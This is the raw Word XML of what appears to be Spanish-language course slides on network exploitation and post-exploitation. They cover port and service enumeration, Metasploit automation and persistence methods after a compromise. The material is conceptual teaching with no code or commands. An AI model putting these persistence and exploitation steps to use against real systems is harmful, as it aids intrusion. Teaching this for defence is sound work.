                              <a:lnTo>
                                <a:pt x="2247" y="159334"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="170357"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="454291"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2247" y="465315"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="8356" y="474345"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="17399" y="480441"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="28448" y="482688"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="113766" y="482688"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="113766" y="319430"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="511937" y="319430"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="511937" y="482688"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="597255" y="482688"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="608304" y="480441"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="617347" y="474345"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="623455" y="465315"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="625703" y="454291"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="625703" y="319430"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="625703" y="241338"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="625703" y="205854"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="625703" y="17035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98908E" id="Graphic 445" o:spid="_x0000_s1026" style="position:absolute;margin-left:817.3pt;margin-top:27.4pt;width:49.3pt;height:45pt;z-index:-15644160;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:0;mso-wrap-distance-top:0;mso-wrap-distance-right:0;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" coordsize="62611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" path="m383959,472033r-142202,l241757,500430r142202,l383959,472033xem383959,415251r-142202,l241757,443649r142202,l383959,415251xem482790,344271r-41961,l440829,386854r-711,141974l186296,528828,184873,386854r255956,l440829,344271r-298615,l143637,571411r338442,l482206,528828r444,-141974l482790,344271xem625703,170357r-2248,-11023l617347,150304r-9043,-6096l597255,141960r-113754,l483501,99377r,-8522l441896,45427r-1067,-1155l440829,141960r,63894l184873,205854r,-21298l184873,42595r156414,l341287,141960r99542,l440829,44272r-1524,-1677l433019,35737r,63640l383959,99377r,-53950l433019,99377r,-63640l400304,,142214,r,141960l99542,141960r,70993l97307,223977r-6109,9029l82156,239102r-11049,2236l60058,239102r-9043,-6096l44907,223977,42672,212953r2235,-11023l82156,186791r17386,26162l99542,141960r-71094,l17399,144208r-9043,6096l2247,159334,,170357,,454291r2247,11024l8356,474345r9043,6096l28448,482688r85318,l113766,319430r398171,l511937,482688r85318,l608304,480441r9043,-6096l623455,465315r2248,-11024l625703,319430r,-78092l625703,205854r,-35497xe" fillcolor="black" stroked="f">
                <v:path arrowok="t"/>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A63F92" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="429"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E1AEF6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1146"/>
        </w:tabs>
        <w:ind w:left="1146" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La explotación de la red significa abusar de las funcionalidades a nivel de red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4201F4ED" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="640" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601DEE9B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1002"/>
        </w:tabs>
        <w:spacing w:before="223" w:line="644" w:lineRule="exact"/>
        <w:ind w:left="1002" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>La identificación de los puertos abiertos, los servicios, específicamente su versión, es importante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77578739" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="644" w:lineRule="exact"/>
        <w:ind w:left="1003"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>antes de explotar cualquier sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EB8A84" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="302"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2DF10D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1003"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:left="1003" w:right="776" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El motivo principal del atacante es obtener acceso a información confidencial como contraseñas, archivos clasificados y detalles de cuentas bancarias presentes en el sistema de información.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33854662" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="253"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE9DC18" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1002"/>
        </w:tabs>
        <w:ind w:left="1002" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Intentaremos encontrar vulnerabilidades en el sistema objetivo para asegurar la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD4AEE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="241"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B204781" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1002"/>
        </w:tabs>
        <w:ind w:left="1002" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Automatizaremos el proceso típico de explotación utilizando Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3063FECC"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292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0732B746" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FAD9FC4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="855"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D709E8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3CBBF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CCC1649" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15815168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38D748A7" wp14:editId="360AF9D2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1304925"/>
                <wp:effectExtent l="0" t="0" r="0"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04925"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1304925"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="447" name="Graphic 447"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1304925"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1304925">
                                <a:moveTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1304544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="448" name="Textbox 448"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1304925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7CDAF23D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="389"/>
                                <w:ind w:left="5608"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>3.2.5 Post-Explotaci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="38D748A7" id="Group 446" o:spid="_x0000_s1224" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:102.75pt;z-index:15815168;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="12192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">
                <v:shape id="Graphic 447" o:spid="_x0000_s1225" style="position:absolute;width:121920;height:13049;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m,1304544r12192000,l12192000,,,,,1304544xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 448" o:spid="_x0000_s1226" type="#_x0000_t202" style="position:absolute;width:121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7CDAF23D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="389"/>
                          <w:ind w:left="5608"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>3.2.5 Post-Explotaci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7FCC54" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCE9C3D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="606"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A4CB564" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1553"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="2664"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El objetivo es mantener el punto de apoyo en el sistema comprometido después de una explotación exitosa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD78004" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="329"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5556E641" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1553"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1428"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Después de pasar por los engorrosos esfuerzos de enumerar el objetivo, encontrar vulnerabilidades y luego explotar los eslabones débiles, necesitamos persistencia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CC2C6D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="332"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D0F8CA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1553"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="2448"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Existen varios métodos de persistencia en función de la naturaleza del sistema de destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE510C9"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0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC1D0B9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1191"/>
        </w:tabs>
        <w:spacing w:before="180"/>
        <w:ind w:left="1191" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Métodos:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F714403" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="34"/>
        <w:ind w:left="1552"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>− Persistencia de la tierra de usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674B1C20" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="34"/>
        <w:ind w:left="1552"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>− Persistencia de la tierra del kernel (Fuera del alcance de este curso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4782ED56" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="30"/>
        <w:ind w:left="1552"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>− Persistencia a nivel de arranque (Fuera del alcance de este curso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D7E3CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="218"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694ABDA2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1192"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1192" w:right="1161" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
